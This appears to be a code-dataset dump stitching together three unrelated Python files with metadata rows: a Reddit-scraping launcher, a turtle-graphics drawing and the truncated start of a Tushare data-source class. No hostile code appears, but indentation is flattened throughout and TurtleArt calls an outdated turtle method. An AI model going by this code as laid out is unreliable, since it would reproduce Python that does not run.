aa500eb21a9bd717b9fbd045171a46d99bbea5f8 | 27,218 | py | Python | master.py | pjha1994/Scrape_reddit | 2a00a83854085e09f0cf53aef81969025876039b | [
"Apache-2.0"
] | null | null | null | master.py | pjha1994/Scrape_reddit | 2a00a83854085e09f0cf53aef81969025876039b | [
"Apache-2.0"
] | null | null | null | master.py | pjha1994/Scrape_reddit | 2a00a83854085e09f0cf53aef81969025876039b | [
"Apache-2.0"
] | null | null | null | import subprocess
import httplib2
import requests
from datetime import datetime
FORMAT = '%d-%m-%Y %H:%M:%S'
my=open('log.txt','a',encoding='utf-8')
def test_internet():
my.write('\nin test_internet'+'-------------------------'+datetime.now().strftime(FORMAT)+'\n')
while(True):
try:
http = httplib2.Http()
status, response = http.request("https://www.google.com")
my.write('\nSUCCESS test_internet'+'-------------------------'+datetime.now().strftime(FORMAT)+'\n\n')
break
except:
continue
my.close()
test_internet()
t=open("mytext.txt",'r')
i=t.read()
temp=int(i)
temp=temp+1
t.close()
t=open("mytext.txt",'w')
t.write(str(temp))
t.close()
#trial
#subprocess.call(["python","worldnews_fast.py",str(i),'AskAnthropology','AskComputerScience','AskElectronics','AskEngineers','AskHR','AskHistorians','AskMen','AskPhysics','AskReddit','AskScienceDiscussion'],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),'24hoursupport','3amjokes','ADHD','AMA','AcademicPhilosophy','AcademicPsychology','Aerospace','Android','AndroidQuestions','Anger','Anxiety'],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),'ProgrammerHumor','Proofreading','Python','RapeCounseling','RetailManagement','STEMdents','SWORDS','SWResources','SampleSize','SanctionedSuicide','Seduction'],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),],shell=True)
#30 each whole list
subprocess.call(["python","worldnews_fast.py",str(i),"24hoursupport","3amjokes","ADHD","AMA","AcademicPhilosophy","AcademicPsychology","Aerospace","Android","AndroidQuestions","Anger","Anxiety","AskAnthropology","AskComputerScience","AskElectronics","AskEngineers","AskHR","AskHistorians","AskMen","AskPhysics","AskReddit","AskScienceDiscussion","AskScienceFiction","AskSocialScience","AskWomen","Ask_Politics","Bash","BehavioralEconomics","BigDataJobs","BipolarReddit","CAD","C_Programming"],shell=True)
subprocess.call(["python","worldnews_fast.py",str(i),"ComputerScience","Confession","CoverTheWorld","Cplusplus","CppForbeginners","CrappyDesign","CrazyIdeas","DIY","DIYCompSci","DailyProgrammer","DeadBedrooms","DebateReligion","DecidingToBeBetter","DigitalNomad","DoesNotTranslate","ECE","Economics","EngineeringStudents","Entrepreneur","ExNoContact","FEA","FE_Exam","Feminism","FluidMechanics","Foodforthought","FoundWords","Freethought","GetMotivated","GetStudying","GraphicsProgramming","HITsWorthTurkingFor","HTMLBattles"],shell=True)
subprocess.call(["python","worldnews_fast.py",str(i),"HomeworkHelp","HowsYourJob","IAmA","IOPsychology","InternetIsBeautiful","LaTeX","LanguageLearning","LearnANewLanguage","LearnJava","LearnJavaScript","LifeProTips","LinguisticsHumor","LongDistance","MachineLearning","Manufacturing","MathHelp","Meditation","NetworkingJobs","Neuropsychology","NoStupidQuestions","ObjectiveC","PCMasterRace","PLC","PhilosophyofScience","PhsychologicalTricks","PoliticalDiscussion","Polyamory","PrintedCircuitBoard","Progether","ProgrammerHumor","Proofreading","Python"],shell=True)
subprocess.call(["python","worldnews_fast.py",str(i),"RapeCounseling","RetailManagement","STEMdents","SWORDS","SWResources","SampleSize","SanctionedSuicide","Seduction","SiblingSupport","Statistics","SuicideWatch","Swift","SysadminJobs","TechNews","ThermalPerformance","Tinder","TinyCode","TowerOfBabel","TrueAskReddit","TrueReddit","Unix","VentureBiotech","WeMetOnline","Web_Development","WhatsTheWord","YoungJobs","academicpsychology","academicpublishing","accounting","advice","androiddev","translator"],shell=True)
subprocess.call(["python","worldnews_fast.py",str(i),"answers","asklinguistics","askmath","askphotography","askreddit","askscience","assistance","astronomy","audiology","autism","badcode","badlinguistics","beermoney","behavioralmedicine","behaviortherapy","bestof","bestofTLDR","bioengineering","biology","biotech","bodybuilding","bookquotes","books","breadboard","bugs","buildapc","business","careerguidance","cfd","changemyview","chemicalengineering","chipdesign"],shell=True)
subprocess.call(["python","worldnews_fast.py",str(i),"civilengineering","cloudcomputing","coding","coffeescript","cogneuro","cogneurocogsci","cognitivelinguistics","cogsci","compilers","complexsystems","compling","compression","compsci","computerforensics","computers","computerscience","conlangs","conspiracy","construction","cosmology","coursearea","cpp","cpp_questions","crypto","cryptography","cs50","csbooks","cscareerquestions","csharp","css","dae","dailyprogrammer"],shell=True)
subprocess.call(["python","worldnews_fast.py",str(i),"dailyscripts","darkinternet","dataisbeautiful","datamining","dementia","depression","diy","documentaries","dotnet","downsyndrome","dyslexia","economics","education","eebooks","electricalengineering","electronics","engineering","engineeringtechnology","entrepreneur","epidemiology","etymology","eurodiversity","everythingscience","evolution","evopsych","explainlikeimfive","favors","finance","financialindependence","findareddit","forhire","forth"],shell=True)
subprocess.call(["python","worldnews_fast.py",str(i),"freelance","freelanceUK","freelanceWriters","funny","gadgets","genetics","getdisciplined","getemployed","getmotivated","getting_over_it","goldredditsays","grammar","grammarwriting","graphic_design","hacking","hardware","history","holdmybeer","homeworkhelp","html","htmlbasics","humanism","hwstartups","hypotheticalsituation","iWantToLearn","ideasfortheadmins","illegaltorrents","improvevocab","india","ineedafavor","intel","intelligence"],shell=True)
subprocess.call(["python","worldnews_fast.py",str(i),"interview","inventions","iwantoutjobs","java","javaTIL","javacodegeeks","javahelp","javascript","jobbit","jobsearchhacks","jokes","jquery","languagetechnology","learnjava","learnjavascript","learnmath","learnprogramming","learnpython","lectures","lifehacks","linguistics","linux","linux4noobs","linuxquestions","literature","logic","machinelearning","marketing","masculism","math","mathbooks","mathematics"],shell=True)
subprocess.call(["python","worldnews_fast.py",str(i),"mathpsych","matlab","mechanicalengineering","medicine","meditation","mentalhealth","mentors","metalworking","microsoft","mmfb","motivation","movies","music","mysql","needadvice","networking","neuro","neurodiversity","neurophilosophy","neuropsychology","newproducts","news","newtoreddit","nonprofit_jobs","nootropics","obvious","occupationaltherapy","ocd","offmychest","opengl","osdev","parkrangers"],shell=True)
subprocess.call(["python","worldnews_fast.py",str(i),"perl","philosophy","philosophyofScience","philosophyofscience","php","physics","pics","politics","privacy","product_design","productivity","programbattles","programming","programmingbuddies","programmingchallenges","psychiatry","psychology","psychopharmacology","psychotherapy","psychscience","puzzles","python","quotes","rage","rational","reasonstolive","rehabtherapy","relationship_advice","relationships","resumes","riddles","robotics"],shell=True)
subprocess.call(["python","worldnews_fast.py",str(i),"ruby","saneorpsycho","schizophrenia","science","scientificresearch","self","selfhelp","selfimprovement","sex","shittyaskscience","shittyideas","shittyprogramming","showerthoughts","simpleliving","slp","socialism","socialmedia","socialskills","sociology","software","softwarearchitecture","softwaredevelopment","softwaregore","solotravel","space","specialed","startups","stopselfharm","suicidology","sysadmin","systems","talesfromtechsupport"],shell=True)
subprocess.call(["python","worldnews_fast.py",str(i),"technology","techsupport","teenagers","testimonials","themixednuts","thisismyjob","tipofmytongue","todayilearned","tr","translationstudies","travel","tutor","ultralight","undelete","undeleteShadow","undergraduateresearch","uniqueminds","visualbasic","web_programming","webdev","whatisthis","whatstheword","windows","windowsazure","womenEngineers","words","work","workonline","worldnews","writingprompts"],shell=True)
#20 each whole list
#subprocess.call(["python","worldnews_fast.py",str(i),"24hoursupport","3amjokes","ADHD","AMA","AcademicPhilosophy","AcademicPsychology","Aerospace","Android","AndroidQuestions","Anger","Anxiety","AskAnthropology","AskComputerScience","AskElectronics","AskEngineers","AskHR","AskHistorians","AskMen","AskPhysics","AskReddit","AskScienceDiscussion"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"AskScienceFiction","AskSocialScience","AskWomen","Ask_Politics","Bash","BehavioralEconomics","BigDataJobs","BipolarReddit","CAD","C_Programming","ComputerScience","Confession","CoverTheWorld","Cplusplus","CppForbeginners","CrappyDesign","CrazyIdeas","DIY","DIYCompSci","DailyProgrammer","DeadBedrooms","DebateReligion"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"DecidingToBeBetter","DigitalNomad","DoesNotTranslate","ECE","Economics","EngineeringStudents","Entrepreneur","ExNoContact","FEA","FE_Exam","Feminism","FluidMechanics","Foodforthought","FoundWords","Freethought","GetMotivated","GetStudying","GraphicsProgramming","HITsWorthTurkingFor","HTMLBattles","HomeworkHelp","HowsYourJob"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"IAmA","IOPsychology","InternetIsBeautiful","LaTeX","LanguageLearning","LearnANewLanguage","LearnJava","LearnJavaScript","LifeProTips","LinguisticsHumor","LongDistance","MachineLearning","Manufacturing","MathHelp","Meditation","NetworkingJobs","Neuropsychology","NoStupidQuestions","ObjectiveC","PCMasterRace","PLC","PhilosophyofScience"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"PhsychologicalTricks","PoliticalDiscussion","Polyamory","PrintedCircuitBoard","Progether","ProgrammerHumor","Proofreading","Python","RapeCounseling","RetailManagement","STEMdents","SWORDS","SWResources","SampleSize","SanctionedSuicide","Seduction","SiblingSupport","Statistics","SuicideWatch","Swift","SysadminJobs","TechNews"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"ThermalPerformance","Tinder","TinyCode","TowerOfBabel","TrueAskReddit","TrueReddit","Unix","VentureBiotech","WeMetOnline","Web_Development","WhatsTheWord","YoungJobs","academicpsychology","academicpublishing","accounting","advice","androiddev","translator","answers","asklinguistics","askmath","askphotography"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"askreddit","askscience","assistance","astronomy","audiology","autism","badcode","badlinguistics","beermoney","behavioralmedicine","behaviortherapy","bestof","bestofTLDR","bioengineering","biology","biotech","bodybuilding","bookquotes","books","breadboard","bugs","buildapc"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"business","careerguidance","cfd","changemyview","chemicalengineering","chipdesign","civilengineering","cloudcomputing","coding","coffeescript","cogneuro","cogneurocogsci","cognitivelinguistics","cogsci","compilers","complexsystems","compling","compression","compsci","computerforensics","computers","computerscience"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"conlangs","conspiracy","construction","cosmology","coursearea","cpp","cpp_questions","crypto","cryptography","cs50","csbooks","cscareerquestions","csharp","css","dae","dailyprogrammer","dailyscripts","darkinternet","dataisbeautiful","datamining","dementia","depression"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"diy","documentaries","dotnet","downsyndrome","dyslexia","economics","education","eebooks","electricalengineering","electronics","engineering","engineeringtechnology","entrepreneur","epidemiology","etymology","eurodiversity","everythingscience","evolution","evopsych","explainlikeimfive","favors","finance"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"financialindependence","findareddit","forhire","forth","freelance","freelanceUK","freelanceWriters","funny","gadgets","genetics","getdisciplined","getemployed","getmotivated","getting_over_it","goldredditsays","grammar","grammarwriting","graphic_design","hacking","hardware","history","holdmybeer"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"homeworkhelp","html","htmlbasics","humanism","hwstartups","hypotheticalsituation","iWantToLearn","ideasfortheadmins","illegaltorrents","improvevocab","india","ineedafavor","intel","intelligence","interview","inventions","iwantoutjobs","java","javaTIL","javacodegeeks","javahelp","javascript"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"jobbit","jobsearchhacks","jokes","jquery","languagetechnology","learnjava","learnjavascript","learnmath","learnprogramming","learnpython","lectures","lifehacks","linguistics","linux","linux4noobs","linuxquestions","literature","logic","machinelearning","marketing","masculism","math"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"mathbooks","mathematics","mathpsych","matlab","mechanicalengineering","medicine","meditation","mentalhealth","mentors","metalworking","microsoft","mmfb","motivation","movies","music","mysql","needadvice","networking","neuro","neurodiversity","neurophilosophy","neuropsychology"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"newproducts","news","newtoreddit","nonprofit_jobs","nootropics","obvious","occupationaltherapy","ocd","offmychest","opengl","osdev","parkrangers","perl","philosophy","philosophyofScience","philosophyofscience","php","physics","pics","politics","privacy","product_design"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"productivity","programbattles","programming","programmingbuddies","programmingchallenges","psychiatry","psychology","psychopharmacology","psychotherapy","psychscience","puzzles","python","quotes","rage","rational","reasonstolive","rehabtherapy","relationship_advice","relationships","resumes","riddles","robotics"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"ruby","saneorpsycho","schizophrenia","science","scientificresearch","self","selfhelp","selfimprovement","sex","shittyaskscience","shittyideas","shittyprogramming","showerthoughts","simpleliving","slp","socialism","socialmedia","socialskills","sociology","software","softwarearchitecture","softwaredevelopment"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"softwaregore","solotravel","space","specialed","startups","stopselfharm","suicidology","sysadmin","systems","talesfromtechsupport","technology","techsupport","teenagers","testimonials","themixednuts","thisismyjob","tipofmytongue","todayilearned","tr","translationstudies","travel","tutor"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"ultralight","undelete","undeleteShadow","undergraduateresearch","uniqueminds","visualbasic","web_programming","webdev","whatisthis","whatstheword","windows","windowsazure","womenEngineers","words","work","workonline","worldnews","writingprompts"],shell=True)
#10 each whole list
#subprocess.call(["python","worldnews_fast.py",str(i),"24hoursupport","3amjokes","ADHD","AMA","AcademicPhilosophy","AcademicPsychology","Aerospace","Android","AndroidQuestions","Anger","Anxiety"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"AskAnthropology","AskComputerScience","AskElectronics","AskEngineers","AskHR","AskHistorians","AskMen","AskPhysics","AskReddit","AskScienceDiscussion","AskScienceFiction","AskSocialScience"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"AskWomen","Ask_Politics","Bash","BehavioralEconomics","BigDataJobs","BipolarReddit","CAD","C_Programming","ComputerScience","Confession","CoverTheWorld","Cplusplus"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"CppForbeginners","CrappyDesign","CrazyIdeas","DIY","DIYCompSci","DailyProgrammer","DeadBedrooms","DebateReligion","DecidingToBeBetter","DigitalNomad","DoesNotTranslate","ECE"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"Economics","EngineeringStudents","Entrepreneur","ExNoContact","FEA","FE_Exam","Feminism","FluidMechanics","Foodforthought","FoundWords","Freethought","GetMotivated"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"GetStudying","GraphicsProgramming","HITsWorthTurkingFor","HTMLBattles","HomeworkHelp","HowsYourJob","IAmA","IOPsychology","InternetIsBeautiful","LaTeX","LanguageLearning","LearnANewLanguage"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"LearnJava","LearnJavaScript","LifeProTips","LinguisticsHumor","LongDistance","MachineLearning","Manufacturing","MathHelp","Meditation","NetworkingJobs","Neuropsychology","NoStupidQuestions"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"ObjectiveC","PCMasterRace","PLC","PhilosophyofScience","PhsychologicalTricks","PoliticalDiscussion","Polyamory","PrintedCircuitBoard","Progether","ProgrammerHumor","Proofreading","Python"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"RapeCounseling","RetailManagement","STEMdents","SWORDS","SWResources","SampleSize","SanctionedSuicide","Seduction","SiblingSupport","Statistics","SuicideWatch","Swift"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"SysadminJobs","TechNews","ThermalPerformance","Tinder","TinyCode","TowerOfBabel","TrueAskReddit","TrueReddit","Unix","VentureBiotech","WeMetOnline","Web_Development"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"WhatsTheWord","YoungJobs","academicpsychology","academicpublishing","accounting","advice","androiddev","translator","answers","asklinguistics","askmath","askphotography"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"askreddit","askscience","assistance","astronomy","audiology","autism","badcode","badlinguistics","beermoney","behavioralmedicine","behaviortherapy","bestof"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"bestofTLDR","bioengineering","biology","biotech","bodybuilding","bookquotes","books","breadboard","bugs","buildapc","business","careerguidance"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"cfd","changemyview","chemicalengineering","chipdesign","civilengineering","cloudcomputing","coding","coffeescript","cogneuro","cogneurocogsci","cognitivelinguistics","cogsci"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"compilers","complexsystems","compling","compression","compsci","computerforensics","computers","computerscience","conlangs","conspiracy","construction","cosmology"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"coursearea","cpp","cpp_questions","crypto","cryptography","cs50","csbooks","cscareerquestions","csharp","css","dae","dailyprogrammer"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"dailyscripts","darkinternet","dataisbeautiful","datamining","dementia","depression","diy","documentaries","dotnet","downsyndrome","dyslexia","economics"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"education","eebooks","electricalengineering","electronics","engineering","engineeringtechnology","entrepreneur","epidemiology","etymology","eurodiversity","everythingscience","evolution"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"evopsych","explainlikeimfive","favors","finance","financialindependence","findareddit","forhire","forth","freelance","freelanceUK","freelanceWriters","funny"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"gadgets","genetics","getdisciplined","getemployed","getmotivated","getting_over_it","goldredditsays","grammar","grammarwriting","graphic_design","hacking","hardware"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"history","holdmybeer","homeworkhelp","html","htmlbasics","humanism","hwstartups","hypotheticalsituation","iWantToLearn","ideasfortheadmins","illegaltorrents","improvevocab"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"india","ineedafavor","intel","intelligence","interview","inventions","iwantoutjobs","java","javaTIL","javacodegeeks","javahelp","javascript"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"jobbit","jobsearchhacks","jokes","jquery","languagetechnology","learnjava","learnjavascript","learnmath","learnprogramming","learnpython","lectures","lifehacks"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"linguistics","linux","linux4noobs","linuxquestions","literature","logic","machinelearning","marketing","masculism","math","mathbooks","mathematics"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"mathpsych","matlab","mechanicalengineering","medicine","meditation","mentalhealth","mentors","metalworking","microsoft","mmfb","motivation","movies"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"music","mysql","needadvice","networking","neuro","neurodiversity","neurophilosophy","neuropsychology","newproducts","news","newtoreddit","nonprofit_jobs"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"nootropics","obvious","occupationaltherapy","ocd","offmychest","opengl","osdev","parkrangers","perl","philosophy","philosophyofScience","philosophyofscience"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"php","physics","pics","politics","privacy","product_design","productivity","programbattles","programming","programmingbuddies","programmingchallenges","psychiatry"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"psychology","psychopharmacology","psychotherapy","psychscience","puzzles","python","quotes","rage","rational","reasonstolive","rehabtherapy","relationship_advice"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"relationships","resumes","riddles","robotics","ruby","saneorpsycho","schizophrenia","science","scientificresearch","self","selfhelp","selfimprovement"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"sex","shittyaskscience","shittyideas","shittyprogramming","showerthoughts","simpleliving","slp","socialism","socialmedia","socialskills","sociology","software"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"softwarearchitecture","softwaredevelopment","softwaregore","solotravel","space","specialed","startups","stopselfharm","suicidology","sysadmin","systems","talesfromtechsupport"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"technology","techsupport","teenagers","testimonials","themixednuts","thisismyjob","tipofmytongue","todayilearned","tr","translationstudies","travel","tutor"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"ultralight","undelete","undeleteShadow","undergraduateresearch","uniqueminds","visualbasic","web_programming","webdev","whatisthis","whatstheword","windows","windowsazure"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"womenEngineers","words","work","workonline","worldnews","writingprompts"],shell=True)
#10 each, short list
#subprocess.call(["python","worldnews_fast.py",str(i),"advice","academicpsychology","academicpublishing","accounting","Web_Development","WhatsTheWord","TrueReddit","Unix","TinyCode","TechNews","STEMdents"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"ProgrammerHumor","Proofreading","Python","PhilosophyofScience","PhsychologicalTricks","PoliticalDiscussion","Neuropsychology","NoStupidQuestions","MathHelp","Meditation","LifeProTips","LinguisticsHumor"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"HomeworkHelp","HowsYourJob","Foodforthought","FoundWords","Freethought","GetMotivated","GetStudying","ECE","Economics","EngineeringStudents","CrazyIdeas","DIY"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"DIYCompSci","DailyProgrammer","Cplusplus","CppForbeginners","ComputerScience","Confession","AskSocialScience","AskWomen","Ask_Politics","Bash","BehavioralEconomics","AskPhysics"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"AskReddit","AskScienceDiscussion","AskHistorians","AskAnthropology","AskComputerScience","AskElectronics","AskEngineers","AcademicPhilosophy","AcademicPsychology","AskComputerScience","AskElectronics","AskEngineers"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"AskHistorians","TrueAskReddit","IOPsychology","InternetIsBeautiful","LearnJava","LearnJavaScript","AskPhysics","AskReddit","C_Programming","Cplusplus","CppForbeginners","HomeworkHelp"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"MathHelp","Python","answers","asklinguistics","askmath","askscience","changemyview","coding","compsci","cpp","cpp_questions","india"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"java","javacodegeeks","javahelp","learnjava","learnmath","learnprogramming","learnpython","math","news","philosophy","physics","programming"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"science","worldnews"],shell=True)
#20,regular,short list
#subprocess.call(["python","worldnews_fast.py",str(i),"advice","academicpsychology","academicpublishing","accounting","Web_Development","WhatsTheWord","TrueReddit","Unix","TinyCode","TechNews","STEMdents","ProgrammerHumor","Proofreading","Python","PhilosophyofScience","PhsychologicalTricks","PoliticalDiscussion","Neuropsychology","NoStupidQuestions","MathHelp","Meditation"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"LifeProTips","LinguisticsHumor","HomeworkHelp","HowsYourJob","Foodforthought","FoundWords","Freethought","GetMotivated","GetStudying","ECE","Economics","EngineeringStudents","CrazyIdeas","DIY","DIYCompSci","DailyProgrammer","Cplusplus","CppForbeginners","ComputerScience","Confession","AskSocialScience","AskWomen"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"Ask_Politics","Bash","BehavioralEconomics","AskPhysics","AskReddit","AskScienceDiscussion","AskHistorians","AskAnthropology","AskComputerScience","AskElectronics","AskEngineers","AcademicPhilosophy","AcademicPsychology","AskComputerScience","AskElectronics","AskEngineers","AskHistorians","TrueAskReddit","IOPsychology","InternetIsBeautiful","LearnJava","LearnJavaScript"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"AskPhysics","AskReddit","C_Programming","Cplusplus","CppForbeginners","HomeworkHelp","MathHelp","Python","answers","asklinguistics","askmath","askscience","changemyview","coding","compsci","cpp","cpp_questions","india","java","javacodegeeks","javahelp","learnjava"],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),"learnmath","learnprogramming","learnpython","math","news","philosophy","physics","programming","science","worldnews"],shell=True)
#b=[1,2,3]
#args = ["python","worldnews_fast.py", b]
#str_args = [ str(x) for x in args ]
#print(str_args[2])
#for x in str_args[2]:
# print(x)
| 197.231884 | 565 | 0.765486 | 2,547 | 27,218 | 8.124853 | 0.186494 | 0.065236 | 0.082633 | 0.091331 | 0.965932 | 0.963323 | 0.943414 | 0.933266 | 0.891418 | 0.891418 | 0 | 0.001483 | 0.009332 | 27,218 | 137 | 566 | 198.671533 | 0.765984 | 0.726798 | 0 | 0.051282 | 0 | 0 | 0.668481 | 0.02681 | 0 | 0 | 0 | 0 | 0 | 1 | 0.025641 | false | 0 | 0.102564 | 0 | 0.128205 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
aa51604546348ae15ebe25315ba544e9e56cf6f5 | 1,616 | py | Python | TurtleArt.py | heint18/Coding-Club-TurtleGraphicArt | 43c1abbe1ebb25f9855f001b1650f432dccad090 | [
"MIT"
] | null | null | null | TurtleArt.py | heint18/Coding-Club-TurtleGraphicArt | 43c1abbe1ebb25f9855f001b1650f432dccad090 | [
"MIT"
] | null | null | null | TurtleArt.py | heint18/Coding-Club-TurtleGraphicArt | 43c1abbe1ebb25f9855f001b1650f432dccad090 | [
"MIT"
] | null | null | null | import turtle
wn = turtle.Screen()
Tracy = turtle.Turtle()
Tracy.pendown()
Tracy.fill(True)
for i in range(2):
Tracy.color("DarkCyan")
Tracy.right(60)
Tracy.circle(50)
Tracy.fill(True)
Tracy.color("Cyan")
Tracy.right(60)
Tracy.circle(50)
Tracy.fill(True)
Tracy.color("dark orchid")
Tracy.right(60)
Tracy.circle(50)
Tracy.fill(True)
Tracy.penup()
Tracy.goto(-200,200)
Tracy.pendown()
for i in range(2):
Tracy.color("dark violet")
Tracy.right(60)
Tracy.circle(50)
Tracy.fill(True)
Tracy.color("DarkMagenta")
Tracy.right(60)
Tracy.circle(50)
Tracy.fill(True)
Tracy.color("coral")
Tracy.right(60)
Tracy.circle(50)
Tracy.fill(True)
Tracy.penup()
Tracy.goto(200,200)
Tracy.pendown()
for i in range(2):
Tracy.color("DarkTurquoise")
Tracy.right(60)
Tracy.circle(50)
Tracy.fill(True)
Tracy.color("Cyan")
Tracy.right(60)
Tracy.circle(50)
Tracy.fill(True)
Tracy.color("aquamarine")
Tracy.right(60)
Tracy.circle(50)
Tracy.fill(True)
Tracy.penup()
Tracy.goto(200,-200)
Tracy.pendown()
for i in range(2):
Tracy.color("red")
Tracy.right(60)
Tracy.circle(50)
Tracy.fill(True)
Tracy.color("coral")
Tracy.right(60)
Tracy.circle(50)
Tracy.fill(True)
Tracy.color("dark salmon")
Tracy.right(60)
Tracy.circle(50)
Tracy.fill(True)
Tracy.penup()
Tracy.goto(-200,-200)
Tracy.pendown()
for i in range(2):
Tracy.color("DarkCyan")
Tracy.right(60)
Tracy.circle(50)
Tracy.fill(True)
Tracy.color("cornflower blue")
Tracy.right(60)
Tracy.circle(50)
Tracy.fill(True)
Tracy.color("DarkGoldenrod")
Tracy.right(60)
Tracy.circle(50)
Tracy.fill(True)
turtle.mainloop() | 15.390476 | 31 | 0.704208 | 256 | 1,616 | 4.445313 | 0.140625 | 0.126538 | 0.182777 | 0.224077 | 0.852373 | 0.852373 | 0.852373 | 0.852373 | 0.852373 | 0.818981 | 0 | 0.0625 | 0.118812 | 1,616 | 105 | 32 | 15.390476 | 0.736657 | 0 | 0 | 0.795181 | 0 | 0 | 0.081633 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.012048 | 0 | 0.012048 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
aa9db2f7e16643ffb01127e6d7674d9f628fdaf5 | 38,179 | py | Python | data_source/TushareSource.py | KevynTang/vein-project | 1a49515ac112493c1b6510d9a382c3b64629ba8e | [
"MIT"
] | 4 | 2021-10-01T04:54:01.000Z | 2021-11-10T05:27:01.000Z | data_source/TushareSource.py | KevynTang/vein-project | 1a49515ac112493c1b6510d9a382c3b64629ba8e | [
"MIT"
] | null | null | null | data_source/TushareSource.py | KevynTang/vein-project | 1a49515ac112493c1b6510d9a382c3b64629ba8e | [
"MIT"
] | 2 | 2021-09-27T05:31:34.000Z | 2022-01-29T00:43:27.000Z | from database import date_getter
from data_source.DataSource import DataSource
from data_source.tokens import TUSHARE_TOKEN
import tushare as ts
import pandas as pd
from tqdm import tqdm as pb
class TushareSource(DataSource):
def __init__(self):
super().__init__()
ts.set_token(TUSHARE_TOKEN)
self.query = ts.pro_api().query
self.stock_list = pd.DataFrame()
self.trade_date_list = {
'daily': pd.DataFrame(),
'weekly': pd.DataFrame(),
'monthly': pd.DataFrame()
}
self.quarter_end_date_list = pd.DataFrame()
self.fields = {
'INDEX_LIST': {
'raw': 'ts_code,name,fullname,market,publisher,index_type,category,base_date,base_point,list_date,weight_rule,desc,exp_date',
'ordered': ['ts_code', 'name', 'fullname', 'market', 'publisher', 'index_type', 'category', 'base_date', 'base_point',
'weight_rule', 'desc', 'list_date', 'exp_date']
},
'STOCK_LIST': {
'raw': 'ts_code,name,area,industry,cnspell,market,exchange,list_status,list_date,delist_date,is_hs',
